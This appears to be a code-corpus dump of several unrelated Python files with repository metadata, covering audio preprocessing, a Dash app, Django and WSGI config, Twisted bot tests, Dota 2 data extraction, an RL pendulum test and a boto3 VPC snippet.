check_dir(target_dir)
src_dir = os.path.join(src_root, _cls)
for fn in tqdm(os.listdir(src_dir)):
src_fn = os.path.join(src_dir, fn)
rate, wav = downsample_mono(src_fn, args.sr)
mask, y_mean = envelope(wav, rate, threshold=args.threshold)
wav = wav[mask]
delta_sample = int(dt*rate)
# cleaned audio is less than a single sample
# pad with zeros to delta_sample size
if wav.shape[0] < delta_sample:
sample = np.zeros(shape=(delta_sample,), dtype=np.int16)
sample[:wav.shape[0]] = wav
save_sample(sample, rate, target_dir, fn, 0)
# step through audio and save every delta_sample
# discard the ending audio if it is too short
else:
trunc = wav.shape[0] % delta_sample
for cnt, i in enumerate(np.arange(0, wav.shape[0]-trunc, delta_sample)):
start = int(i)
stop = int(i + delta_sample)
sample = wav[start:stop]
save_sample(sample, rate, target_dir, fn, cnt)
def test_threshold(args):
src_root = args.src_root
wav_paths = glob('{}/**'.format(src_root), recursive=True)
wav_path = [x for x in wav_paths if args.fn in x]
if len(wav_path) != 1:
print('audio file not found for sub-string: {}'.format(args.fn))
return
rate, wav = downsample_mono(wav_path[0], args.sr)
mask, env = envelope(wav, rate, threshold=args.threshold)
plt.style.use('ggplot')
plt.title('Signal Envelope, Threshold = {}'.format(str(args.threshold)))
plt.plot(wav[np.logical_not(mask)], color='r', label='remove')
plt.plot(wav[mask], color='c', label='keep')
plt.plot(env, color='m', label='envelope')
plt.grid(False)
plt.legend(loc='best')
plt.show()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Cleaning audio data')
parser.add_argument('--src_root', type=str, default='wavfiles',
help='directory of audio files in total duration')
parser.add_argument('--dst_root', type=str, default='clean',
help='directory to put audio files split by delta_time')
parser.add_argument('--delta_time', '-dt', type=float, default=1.0,
help='time in seconds to sample audio')
parser.add_argument('--sr', type=int, default=16000,
help='rate to downsample audio')
parser.add_argument('--fn', type=str, default='3a3d0279',
help='file to plot over time to check magnitude')
parser.add_argument('--threshold', type=str, default=20,
help='threshold magnitude for np.int16 dtype')
args, _ = parser.parse_known_args()
#test_threshold(args)
split_wavs(args) | [
"mosesfuego@gmail.com"
] | mosesfuego@gmail.com |
5281cb4b6846e006b6e7a3720f1592888f6f8d12 | 4f8766f4d7227ab4881f31faaeb6b5f7abe39a3f | /app.py | 113201347b844e630843ae53ac470cc23d90edf7 | [] | no_license | eanderson-ei/essc-search | 7095db34a7db50aafd50bbf93f3b68d3f84df4a6 | da6c1395df3feca84865ddb0c30adb5f138b205e | refs/heads/main | 2023-07-14T01:08:11.574874 | 2021-08-23T19:43:15 | 2021-08-23T19:43:15 | 300,695,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | import dash
import dash_bootstrap_components as dbc
import dash_auth
import json
import os
external_stylesheets = [dbc.themes.YETI] # Also try LITERA, SPACELAB
external_scripts = ["https://rawgit.com/neo4j-contrib/neovis.js/master/dist/neovis.js"]
app = dash.Dash(__name__,
external_stylesheets=external_stylesheets,
external_scripts=external_scripts,
show_undo_redo=True)
server = app.server
app.config.suppress_callback_exceptions = True
# UNCOMMENT FOR BASIC AUTHENTICATION
# # Keep this out of source code repository - save in a file or a database
# # Local dev
# try:
# with open('secrets/passwords.json') as f:
# VALID_USERNAME_PASSWORD_PAIRS = json.load(f)
# # Heroku dev
# except:
# json_creds = os.environ.get("VALID_USERNAME_PASSWORD_PAIRS")
# VALID_USERNAME_PASSWORD_PAIRS = json.loads(json_creds)
# auth = dash_auth.BasicAuth(
# app,
# VALID_USERNAME_PASSWORD_PAIRS
# )
| [
"eanderson@enviroincentives.com"
] | eanderson@enviroincentives.com |
0f398c0f5262e9288ee7ba927428f264f7f6085c | 555dd4290421ba30d370425aa383d0bd823f33f4 | /Supermercado/market/migrations/0024_auto_20200812_1050.py | 0393aabf570edfa332756bbeaca94119c92627c7 | [] | no_license | RodrigoSHM1999/Proyecto-Final | f7e63798f6568f9078b08ff9c9487f50fd296952 | 8cdd2a6ba3d0cefb8ac817c8e40f3df1c2225616 | refs/heads/master | 2022-12-02T07:37:23.349182 | 2020-08-17T15:28:46 | 2020-08-17T15:28:46 | 278,261,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # Generated by Django 3.1 on 2020-08-12 15:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('market', '0023_compra_product_id'),
]
operations = [
migrations.RemoveField(
model_name='compra',
name='product_id',
),
migrations.AddField(
model_name='compra',
name='product_id',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='market.product'),
preserve_default=False,
),
]
| [
"agarciapu@unsa.edu.pe"
] | agarciapu@unsa.edu.pe |
81b307519098ba7ed57648b55ddc5404845cae3a | eeace2da37c7dc48f30ba2e376b498c13b35cc6f | /tests.py | 1ee9d08f7bceb39021f957d9def5b9eca0e425cb | [
"ISC"
] | permissive | CodeBlueDev/nanobot | 9ee1a9510fa386cebfbbaa55c06f5fab5a96fc3a | bd72797dc1db238a6860272bf90e7c95207c70ee | refs/heads/master | 2020-12-27T09:26:59.275206 | 2014-05-30T18:05:39 | 2014-05-30T18:05:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,677 | py | from twisted.trial import unittest
from twisted.internet import task, defer
import nanobot
import app
import string
class CacheTests(unittest.TestCase):
def setUp(self):
self.clock = task.Clock()
self.cache = app.UrlCache(reactor=self.clock, expiration=60)
self.cache.enable()
def tearDown(self):
self.cache.disable()
def testGetReaperNotRun(self):
self.cache.update("foo", "bar")
self.assertEquals(self.cache.fetch("foo"),
"bar", "Expected cache to have 'foo' for 'bar'")
def testReaperExpiresItem(self):
self.cache.update("foo", "bar")
self.assertEquals(self.cache.fetch("foo"),
"bar", "Expected cache to have 'foo' for 'bar'")
self.clock.advance(60)
value = self.cache.fetch("foo")
self.assertIs(value, None,
"Cache had '%s' for entry 'foo'" % value)
def testReaperLeavesItem(self):
self.clock.advance(59)
self.cache.update("foo", "bar")
self.assertEquals(self.cache.fetch("foo"),
"bar", "Expected cache to have 'foo' for 'bar'")
self.clock.advance(1)
self.cache.update("foo", "bar")
self.assertEquals(self.cache.fetch("foo"),
"bar", "Expected cache to have 'foo' for 'bar'")
class IgnorantCache(object):
def __init__(self):
pass
def fetch(self, key):
pass
def update(self, key, value):
pass
class MockResponse(object):
def __init__(self, data, headers, code):
self.data = data
self.code = code
self._headers = headers
@property
def headers(self):
return self
def getRawHeaders(self, key):
return self._headers[key.lower()]
class MockTreq(object):
def __init__(self, url, data, headers, code=None):
self.url = url
self.data = data
self.headers = headers
self.code = code or 200
def get(self, url, timeout=None, headers={}):
if not self.url == url:
raise Exception("Wrong URL, got %s, expected %s" % (url, self.url))
return defer.succeed(MockResponse(self.data, self.headers,
code=self.code))
def head(self, url, timeout=None, headers={}):
if not self.url == url:
raise Exception("Wrong URL, got %s, expected %s" % (url, self.url))
return defer.succeed(MockResponse("", self.headers, code=self.code))
def collect(self, response, callback):
callback(response.data.decode("utf-8"))
class TestMessageHandler(unittest.TestCase):
def setUp(self):
self.clock = task.Clock()
self.hit_cache = IgnorantCache()
self.miss_cache = IgnorantCache()
self.encoding = "UTF-8"
self.template = string.Template("""<html>
<head>
<title>${title}</title>
</head>
<body>Example body</body>
</html>""")
def testNoUrl(self):
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, "foo bar",
lambda x: self.fail(x),
self.encoding, 255)
d = next(iter(message_handler), None)
self.assertIs(d, None, "Should not give any deferreds")
def testUnsupportedScheme(self):
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, "gopher://foo/bar#baz",
lambda x: self.fail(x),
self.encoding, 255)
d = next(iter(message_handler), None)
self.assertIs(d, None, "Should not give any deferreds")
def testForbidden(self):
msg = "http://foo/bar"
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, msg,
lambda x: self.fail(x),
self.encoding, 255)
iterator = iter(message_handler)
d = self.step(iterator, msg, "foo", code=400)
d.addCallback(self.ensureException)
def testUnsupportedType(self):
msg = "http://foo/bar"
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, msg,
lambda x: self.fail(x),
self.encoding, 255)
iterator = iter(message_handler)
d = self.step(iterator, msg, "foo",
headers={"content-type": ("image/png",)})
d.addCallback(self.ensureException)
def testBrokenTypeHeader(self):
msg = "http://foo/bar"
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, msg,
lambda x: self.fail(x),
self.encoding, 255)
iterator = iter(message_handler)
d = self.step(iterator, msg, "foo",
headers={"content-type": tuple()})
d.addCallback(self.ensureException)
def testMissingTypeHeader(self):
msg = "http://foo/bar"
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, msg,
lambda x: self.fail(x),
self.encoding, 255)
iterator = iter(message_handler)
d = self.step(iterator, msg, "foo",
headers={})
d.addCallback(self.ensureException)
def ensureException(self, e):
errors = self.flushLoggedErrors(app.AppException)
self.assertEqual(len(errors), 1)
def step(self, iterator, url, title, code=None, headers=None):
if headers is None:
headers = {"content-type": ("text/html;utf-8",)}
self.output = "title: %s" % title
app.treq = MockTreq(url, self.template.substitute(title=title),
headers=headers, code=code)
d = next(iterator)
title = "title: %s" % title
d.addCallback(lambda e: self.clock.advance(2))
return d
def testHttpUrl(self):
self.runSequence(["http://meep.com/foo/bar.baz.html#foo"])
def testMultipleUrls(self):
self.runSequence(["http://meep.com/foo/bar.baz.html#foo",
"http://meep.com/foo/bar.baz.html#bar"])
def testHttpAndHttps(self):
self.runSequence(["http://meep.com/foo/bar.baz.html#foo",
"https://meep.com/foo/bar.baz.html#bar"])
def callback(self, x):
self.assertEqual(x, self.output)
return defer.succeed(None)
def runSequence(self, urls):
message_handler = app.MessageHandler(self.clock, self.hit_cache,
self.miss_cache, " ".join(urls),
self.callback,
self.encoding, 255)
iterator = iter(message_handler)
d = defer.succeed(None)
for url in urls:
_, _, title = url.partition("#")
d.addCallback(lambda _:self.step(iterator, url, title))
d.addCallback(lambda _: self.assertRaises(StopIteration, next, iterator))
| [
"seppo.yliolli@gmail.com"
] | seppo.yliolli@gmail.com |
3b0b0c756ee1df1d3643bade4613acc9c94aa35c | 43051d6ac06dc092c77af86ef8e5bcd2de3c0dd9 | /python/loop14.py | 8de558a2c7e2485efaa2804a1b8f62a571fc5a0b | [] | no_license | sAnjali12/BsicasPythonProgrammas | c3b9413615e542afccdec9c5cd9246105421f843 | cc1d4689cf7afd84c1280c94aa0072e46a4df614 | refs/heads/master | 2020-06-28T21:16:40.597495 | 2019-08-03T07:11:22 | 2019-08-03T07:11:22 | 200,344,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | i = 0
j = 1
c = 0
while i<20:
print i
c = i+j
i = j
j = c
| [
"anjalisen060@gmail.com"
] | anjalisen060@gmail.com |
2681bf3905a0e8f207d86b408b6412bd57e189fe | cf7b5e7eee3ce2e18d0d255d1e424bf280428d10 | /app/proto6749/wsgi.py | f046b777cf2e9243d08d55afced427e1cf60746d | [
"MIT"
] | permissive | PedramHD/proto6749 | 4e5b5d4b2156d05608e7fc92adf2a478978acfbd | 1aa2d63a098f0f3ba759a0e995f29d0c4ba2a471 | refs/heads/master | 2020-09-28T07:00:39.474061 | 2019-12-03T14:33:53 | 2019-12-03T14:33:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for proto6749 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proto6749.settings')
application = get_wsgi_application()
| [
"danielf@yes.com"
] | danielf@yes.com |
c2a2bfd82c4476cf27893bafb5ee032d122c5c9b | 67265dc35b445639a7b288b75eef8fb5aecf3778 | /not_a_virus.py | cace8f104c133f6910059423cf1af51953924ad6 | [] | no_license | zer0relm/zer0relm214 | 7a1fcf962ca5da14a96502e181283609314f68b6 | f2e7d5076df69141d7617fc6e1ba57748eab0659 | refs/heads/master | 2021-01-03T10:36:11.701521 | 2020-05-05T23:08:13 | 2020-05-05T23:08:13 | 239,891,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | import random
#import pyautogui
loop_boi = 69
while loop_boi < 420:
print("UwU")
| [
"zer0relm@gmail.com"
] | zer0relm@gmail.com |
820cee28dc44d3740f71f0e09127e9af4343a504 | cb44d69ab09d7515e8919198db1d58f155576775 | /dataset_gathering/5_extracting_attributes/one_by_one_match_extraction.py | daa5f3bb1f62a8132f8df4d1fbac36bad7c943dd | [] | no_license | dtoma95/dota2_mmr_estimation | 8ee5268b5d64a82a4f17e9a1ac4e541050b26460 | 44975887090f127cfb5a3df97a68be421ff9dbe2 | refs/heads/master | 2020-04-24T15:31:02.266035 | 2019-07-08T17:00:25 | 2019-07-08T17:00:25 | 172,070,895 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,677 | py | import json
import os
DO_ITEMS = False
DO_HEROES = False
DO_ALL_PLAYERS = True
PATH = "../../data/tomislav"
with open("heroes.json", "r") as f:
heroes = json.load(f)
with open("items.json", "r") as f:
items = json.load(f)
def read_data1(path):
f_write = open("one_be_one.csv", "w")
write_header(f_write)
for filename in os.listdir(path):
if ".json" not in filename:
print(filename)
continue
fr = open(path+"/" + filename, "r")
stringo = fr.readline()
d = json.loads(stringo)
fr.close()
for player in d:
account_id = player["account_id"]
recorded_games = len(player["match_history"])
mmr = player["solo_mmr"]
for match in player["match_history"]:
line_data = extract_match_data(match, account_id, mmr)
if line_data is not None:
line = ""
for i in line_data:
line += str(i)+","
f_write.write(line[:-1]+"\n")
break
f_write.close()
def write_header(f_write):
header = "account_id,match_id,mmr,win,is_radiant,duration"
basic_data = ["gold_per_min", "xp_per_min", "kills", "deaths", "assists", "last_hits", "denies", "level"]
heroes_one_hot = []
if DO_HEROES:
for id in heroes.keys():
heroes_one_hot.append(heroes[id])
else:
basic_data.append("hero_id")
items_one_hot = []
if DO_ITEMS:
for id in items.keys():
items_one_hot.append(items[id])
players = ["this_player"]
if DO_ALL_PLAYERS:
players.extend(["teammate_1", "teammate_2", "teammate_3", "teammate_4", "enemy_1", "enemy_2", "enemy_3", "enemy_4", "enemy_5"])
for p in players:
for b in basic_data:
header += "," + p + "_" + b
for h in heroes_one_hot:
header+= ","+p+"_"+ h
for i in items_one_hot:
header+= ","+p+"_"+ i
f_write.write(header + "\n")
#account_id, mmr, win, is_radiant, duration
#gpm, xpm, denies, lh
def extract_match_data(match, player_id, mmr):
retval = []
retval.append(player_id)
retval.append(match["match_id"])
retval.append(mmr)
#"tower_status_radiant": 0,
#"tower_status_dire": 1830,
#"barracks_status_radiant": 0,
#"barracks_status_dire": 63,
#"radiant_score": 31,
#"dire_score": 38
isRadient = False
covek = None
for p in match["players"]:
if player_id == p["account_id"]:
if p["player_slot"] < 5:
isRadient = True
else:
isRadient = False
covek = p
break
if covek is None:
print("wtf")
return None
if isRadient:
retval.append( match["radiant_win"])
else:
retval.append(not match["radiant_win"])
retval.append(isRadient)
retval.append(match["duration"])
retval.extend(player_details(covek))
if DO_ALL_PLAYERS:
# my team
brojac = 1
for p in match["players"]:
try:
if player_id == p["account_id"]:
continue
except:
pass
if isRadient and p["player_slot"] < 5:
retval.extend(player_details(p))
brojac += 1
elif not isRadient and p["player_slot"] > 5:
retval.extend(player_details(p))
brojac += 1
if brojac != 5:
print("MYTEAM", brojac, match["match_id"])
# enemy team
for p in match["players"]:
try:
if player_id == p["account_id"]:
continue
except:
pass
if isRadient and p["player_slot"] > 5:
retval.extend(player_details(p))
brojac += 1
elif not isRadient and p["player_slot"] < 5:
retval.extend(player_details(p))
brojac += 1
if brojac != 10:
print("GRESKA", brojac, match["match_id"])
return None
return retval
def player_details(covek):
retval = []
retval.append(covek["gold_per_min"])
retval.append(covek["xp_per_min"])
retval.append(covek["kills"])
retval.append(covek["deaths"])
retval.append(covek["assists"])
retval.append(covek["last_hits"])
retval.append(covek["denies"])
retval.append(covek["level"])
if DO_HEROES:
onehothero = heroes_one_hot(covek["hero_id"], heroes)
retval.extend(onehothero)
else:
retval.append(covek["hero_id"])
if DO_ITEMS:
my_items = [covek["item_0"], covek["item_1"], covek["item_2"], covek["item_3"], covek["item_4"],
covek["item_5"], covek["backpack_0"], covek["backpack_1"], covek["backpack_2"]]
onehotitem = items_one_hot(my_items, items)
retval.extend(onehotitem)
return retval
def heroes_one_hot(hero_id, heroes):
retval = []
for key in heroes.keys():
retval.append(0)
if hero_id < 24:
index_for_dic = hero_id - 1
elif hero_id < 115:
index_for_dic = hero_id - 2
else:
index_for_dic = hero_id - 6
retval[index_for_dic] = 1
return retval
def items_one_hot(my_items, items):
retval = []
for key in items.keys():
retval.append(0)
for item_id in my_items:
if item_id == 0:
continue
if item_id < 265:
index_for_dic = item_id - 1
else:
index_for_dic = item_id - 2
retval[index_for_dic] += 1
return retval
read_data1(PATH) | [
"dtoma95@gmail.com"
] | dtoma95@gmail.com |
0242461d1b3d92b2945233540096b2a542889e70 | afe0d07073fac2fe70ee63580989f936e6c44197 | /d3.2.py | 407beff430b1101c907fa8318c7c4543ee56a064 | [] | no_license | DineshBE/fjod7ofofk | c7261eec934457b8715797329904a4e3cd195c92 | 25f674de03d09aa73be729110096f4d89ca521ff | refs/heads/master | 2020-06-19T05:11:48.715813 | 2019-07-19T06:41:33 | 2019-07-19T06:41:33 | 196,575,990 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | yz = int(input())
mylist = list(map(int,input().split()))
print(max(mylist))
| [
"noreply@github.com"
] | DineshBE.noreply@github.com |
fa8960c5b3b5dc86599a11cecec2129c42140c3e | 8d9b47358c9ff25f456b5a33511d1a1b7b99b67f | /tests/pendulum_test.py | dc45e33b5330fe690bd786e2ce10c3e87980ac34 | [] | no_license | gearsuccess/deep_rl | f84214b1b2ef00b6e8e2ebcaad4f47b5f8468f80 | 05e21eb634a2cdd64b85be8a075cfd686080b915 | refs/heads/master | 2022-11-09T19:53:14.948082 | 2020-07-02T12:42:05 | 2020-07-02T12:42:05 | 280,841,931 | 0 | 1 | null | 2020-07-19T10:26:17 | 2020-07-19T10:26:16 | null | UTF-8 | Python | false | false | 3,178 | py | import os
import gym
import argparse
import numpy as np
import torch
from networks import *
# Configurations
parser = argparse.ArgumentParser()
parser.add_argument('--algo', type=str, default='atac',
help='select an algorithm among vpg, trpo, ppo, ddpg, td3, sac, asac, tac, atac')
parser.add_argument('--load', type=str, default=None,
help='copy & paste the saved model name, and load it (ex. --load=Pendulum-v0_...)')
parser.add_argument('--render', action="store_true", default=True,
help='if you want to render, set this to True')
parser.add_argument('--test_eps', type=int, default=10000,
help='testing episode number')
parser.add_argument('--gpu_index', type=int, default=0)
args = parser.parse_args()
device = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')
def main():
"""Main."""
env = gym.make('Pendulum-v0')
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.shape[0]
if args.algo == 'trpo' or args.algo == 'ppo':
mlp = GaussianPolicy(obs_dim, act_dim).to(device)
elif args.algo == 'ddpg' or args.algo == 'td3':
mlp = MLP(obs_dim, act_dim, hidden_sizes=(128,128), output_activation=torch.tanh).to(device)
elif args.algo == 'sac' or args.algo == 'asac' or args.algo == 'tac' or args.algo == 'atac':
mlp = ReparamGaussianPolicy(obs_dim, act_dim, hidden_sizes=(128,128)).to(device)
if args.load is not None:
pretrained_model_path = os.path.join('./save_model/' + str(args.load))
pretrained_model = torch.load(pretrained_model_path, map_location=device)
mlp.load_state_dict(pretrained_model)
test_sum_returns = 0.
test_num_episodes = 0
for episode in range(1, args.test_eps+1):
total_reward = 0.
obs = env.reset()
done = False
while not done:
if args.render:
env.render()
if args.algo == 'trpo' or args.algo == 'ppo':
action, _, _, _ = mlp(torch.Tensor(obs).to(device))
action = action.detach().cpu().numpy()
elif args.algo == 'ddpg' or args.algo == 'td3':
action = mlp(torch.Tensor(obs).to(device)).detach().cpu().numpy()
elif args.algo == 'sac' or args.algo == 'asac' or args.algo == 'tac' or args.algo == 'atac':
action, _, _ = mlp(torch.Tensor(obs).to(device))
action = action.detach().cpu().numpy()
next_obs, reward, done, _ = env.step(action)
total_reward += reward
obs = next_obs
test_sum_returns += total_reward
test_num_episodes += 1
test_average_return = test_sum_returns / test_num_episodes if test_num_episodes > 0 else 0.0
if episode % 10 == 0:
print('---------------------------------------')
print('Episodes:', test_num_episodes)
print('TestAverageReturn:', test_average_return)
print('---------------------------------------')
if __name__ == "__main__":
main()
| [
"kid33629@gmail.com"
] | kid33629@gmail.com |
557abde5a656bdf7afc39a8cb61417386b872158 | dddea587abd91003b143c30fe1428635f133b62a | /summarize_summaries_standard.py | 207bb5f40c7c00f7329fde94be2f818891f75167 | [] | no_license | sellalab/Mutator | 085721d51c964c9c458e76e02ec5972a7d432012 | 125895b2262c263720a473f1f3b22c7565e71c33 | refs/heads/master | 2022-05-01T07:33:27.781032 | 2022-04-07T20:29:05 | 2022-04-07T20:29:05 | 236,088,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,520 | py | import numpy as np
import pickle
import argparse
import mutator_classes
from collections import defaultdict as ddict
import os
import gzip
import stationary_distribution_aug as sd
def main():
# a set of default params to use
default_params = {'N': 2000, # population size
'M': 1000, # number of modifier loci, M
'h': 0.5, # h
's': 0.01, # s - together hs are the average fitness effects of mutations at selected loci
'phi': 1E-12, # effect size of mutator alleles
'mutator_mutation_rate': 1.25E-7, # Mutation rate at modifier sites
'mutation_rate': 1.25E-7, # baseline mutation rate at selected sites, u0
'loci': 3E8 * 0.08, # number of selected loci
'constant': True, # is the population size constant
'split_gen': 0,
# the generation at which the ancestral population is split into europeans and africans
'backup_gen': 100, # backup the population every 100 generations
'ignore_gen': 70, # stop simulations this many generations from the present
'total_gen': 10000, # how many total generations to simulate
'outpath': 'blah3', # where do we store results
'NE_path': '/Users/will_milligan/PycharmProjects/MUTATOR_FINAL/MSMC_NE_dict.pickle', # where do we get population size estimates
'invariable_mutator_mutation_rate': True,
'variable_mutator_effect': False,
'sampling_interval': 10}
print(default_params)
# # get and parse input string
parser = argparse.ArgumentParser()
parser.add_argument("--N", help="population_size", type=int, default=default_params['N'])
parser.add_argument("--M", help="number of modifier loci, M", type=int, default=default_params['M'])
parser.add_argument("--h", help="h", type=float, default=default_params['h'])
parser.add_argument("--s", help="s", type=float, default=default_params['s'])
parser.add_argument("--phi", help="Mutator effect size", type=float, default=default_params['phi'])
parser.add_argument("--mutator_mutation_rate", help="Mutation rate at modifier sites", type=float, default=default_params['mutator_mutation_rate'])
parser.add_argument("--mutation_rate", help="baseline mutation rate at selected sites, u0", type=float, default=default_params['mutation_rate'])
parser.add_argument("--loci", help="number of selected loci", type=float, default=default_params['loci'])
parser.add_argument("--constant", help="Is pop. size constant?", type=bool, default=default_params['constant'])
parser.add_argument("--invariable_mutator_mutation_rate", help="Is the mutator mutation rate invariable?", type=bool,
default=default_params['invariable_mutator_mutation_rate'])
parser.add_argument("--split_gen", help="What generation do we split at, None if not split", type=int, default=default_params['split_gen'])
parser.add_argument("--total_gen", help="Total num. of generations to simulate", type=int, default=default_params['total_gen'])
parser.add_argument("--backup_gen", help="How many generations between backing up populations ", type=int, default=default_params['backup_gen'])
parser.add_argument("--ignore_gen", help="Stop simulations at this generations", type=int, default=default_params['ignore_gen'])
parser.add_argument("--outpath", help="Where to store populations, should be directory (i.e., end in /)", type=str, default=default_params['outpath'])
parser.add_argument("--NE_path", help="Where are pop. sizes stored", type=str, default=default_params['NE_path'])
parser.add_argument("--variable_mutator_effect", help="False is mutator effect size is constant", type=bool, default=default_params['variable_mutator_effect'])
parser.add_argument("--store_trajectories", help="Should we consolidate and store all mutator trajectories", type=bool, default=False)
parser.add_argument("--sampling_interval", help="How often to sample mutator frequencies in units of N ",
type=float, default=default_params['sampling_interval'])
args = parser.parse_args()
# check that results directory exists
assert os.path.exists(args.outpath)
# get the directory where all replicates are stored
replicate_directory = os.path.dirname(args.outpath)
# load all summarized results
all_results = load_all_summaries(replicate_directory=replicate_directory)
# summary_functions
# calculate the mean, variance between and within populations.
summary_functions = {'mean' : (lambda a: np.nanmean(a[2]),
lambda a: np.sqrt(np.nanvar(a[3])/len(a[3]))*1.96,
lambda sd: sum([q*p for q,p in sd.items()])),
'var' : (lambda a: np.nanvar(a[2]),
lambda a: np.sqrt(np.nanvar(a[4])/len(a[4]))*1.96,
lambda sd: sum([q**2*p for q,p in sd.items()])-sum([q*p for q,p in sd.items()])**2),
'within' : (lambda a: np.nanmean(a[2]*(1-a[2])),
lambda a: np.sqrt(np.nanvar(a[5])/len(a[5]))*1.96,
lambda sd: sum([q*(1-q)*p for q,p in sd.items()]))}
results_summarized = summarize_all_results(results = all_results,
summary_functions = summary_functions,
args = args)
write_out(replicate_directory=replicate_directory,all_results_summarized = results_summarized)
def write_out(replicate_directory,all_results_summarized):
with open(os.path.join(replicate_directory,'all_results_summarized'),'wb+') as fout:
pickle.dump((all_results_summarized),fout)
# use the provided functions to summarize summaries
def summarize_all_results(results,summary_functions,args):
summarized_results = {}
for summary, (sim_function, error_function, sd_function) in summary_functions.items():
summarized_results[summary] = (sim_function(results), error_function(results), sd_function(results[-1]))
print(summary,summarized_results[summary])
return summarized_results
# load the summaries from simulations
def load_all_summaries(replicate_directory):
all_freqs = None
all_means = []
all_vars = []
all_within = []
for v in os.listdir(replicate_directory):
v_directory = os.path.join(replicate_directory,v)
if not os.path.isdir(v_directory): continue
# we only do this for simple (panmictic & constant N) simulations which are by default 'ancestral'
with open(os.path.join(os.path.join(v_directory,'ancestral'), 'summarized_results.pickle'), 'rb') as fin:
(args, population, mutator_frequencies, mean, variance, within, sD) = pickle.load(fin)
if type(all_freqs)==type(None):
all_freqs = mutator_frequencies
else:
all_freqs = np.append(mutator_frequencies,all_freqs,axis=1)
all_means.append(mean)
all_vars.append(variance)
all_within.append(within)
return (args,population,all_freqs,all_means,all_vars, all_within, sD)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | sellalab.noreply@github.com |
7fb7c4d5f15747a600819c85ad9266779fdb129c | a676d918b568964d475a3ea25c79d446b1783abf | /Chap0/project/ex16.py | cbb9237d4682e1be0fb5529a2f836c5ce46caa04 | [] | no_license | AIHackerTest/SailingChen10_Py101-004 | 35d76d32e6a21c487ce8d48f974532fb38a05051 | 3c95e04f7d54529e897beec7652e089514ee6dd5 | refs/heads/master | 2021-05-15T00:32:35.407998 | 2017-09-12T08:31:02 | 2017-09-12T08:31:02 | 103,240,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # coding = utf-8
from sys import argv
script, filename = argv
print ("We're going to erase %r." % filename)
print ("If you don't want that, hit CTRL-C (^C).")
print ("If you do want that, hit RETURN.")
input("yes or no: ")
print ("Opening the file...")
target = open(filename, 'w')
print ("Truncating the file. Goodbye!")
target.truncate()
print ("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print ("I'm going to write these to the file.")
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
print ("And finally,we close it.")
target.close()
| [
"xiaowan5219@gmail.com"
] | xiaowan5219@gmail.com |
745b14a03850f6c1021fad34879e927a63ac2e47 | 06de128f85f8c382a390381f5140b743ccf4a315 | /blog/urls.py | 71d273de9c2e21ba56103476bb0ae13a9b7aa372 | [] | no_license | tisaneza/my-first-blog | e301b34c2f19905da667cea02e0e65bf24b734e1 | 1b2561c80aed5b3e019b1923e2a8f10175bd49bd | refs/heads/master | 2020-05-27T09:24:44.801313 | 2019-05-25T13:41:39 | 2019-05-25T13:41:39 | 188,565,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.urls import path
from . import views
urlpatterns =[
path("", views.post_list, name="post_list"),
]
| [
"transfer.stolp@gmail.com"
] | transfer.stolp@gmail.com |
0650f4a2cc4e43fa1e3590a8973f874af293b3fd | 96a31d98f2b24fd446f956ba2d524014942b0167 | /github-ec2/create-vpc.py | 604932ac1a2dd5f551a3b8f702e2333e5f8c73a7 | [] | no_license | Singh-Venus/Github_1 | b4a05fea221c2f67db4cfc9d9248d7d87c4d2679 | 8e859585f96f42e4e720c16554affafec030a4da | refs/heads/master | 2020-06-15T08:30:57.179268 | 2019-07-05T10:09:42 | 2019-07-05T10:09:42 | 195,248,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | import boto3
client = boto3.client('ec2',region_name='your region', aws_access_key_id='your access key id', aws_secret_access_key='your access key')
response = client.create_vpc(
CidrBlock='string',
AmazonProvidedIpv6CidrBlock=True|False,
DryRun=True|False,
InstanceTenancy='default'|'dedicated'|'host'
)
print(response) | [
"venus.singh.1016@gmail.com"
] | venus.singh.1016@gmail.com |
c4935c15260daefa5a287c54e3f6c62cb08b8752 | 15e7a66981d776bc0cf380a12b9b52196072fcbc | /python/misc/dataFrameToDatabase/dataFrameToDatabase.py | 59f95b02645ef93d80f48dd3f5a6fd77148ddf83 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | maxklr/Geospatial-Center-Code | 21520904809a1b73c1a2dca42ead2443874d77ce | a8a1c7028d254690af788cbdd9cbdf859a422413 | refs/heads/master | 2023-07-12T07:48:24.437332 | 2021-08-24T21:57:39 | 2021-08-24T21:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,799 | py | import logging
import time
import pandas as pd
from pandas.errors import EmptyDataError
import sqlalchemy
from typing import Union, List
class DataFrameToDatabase:
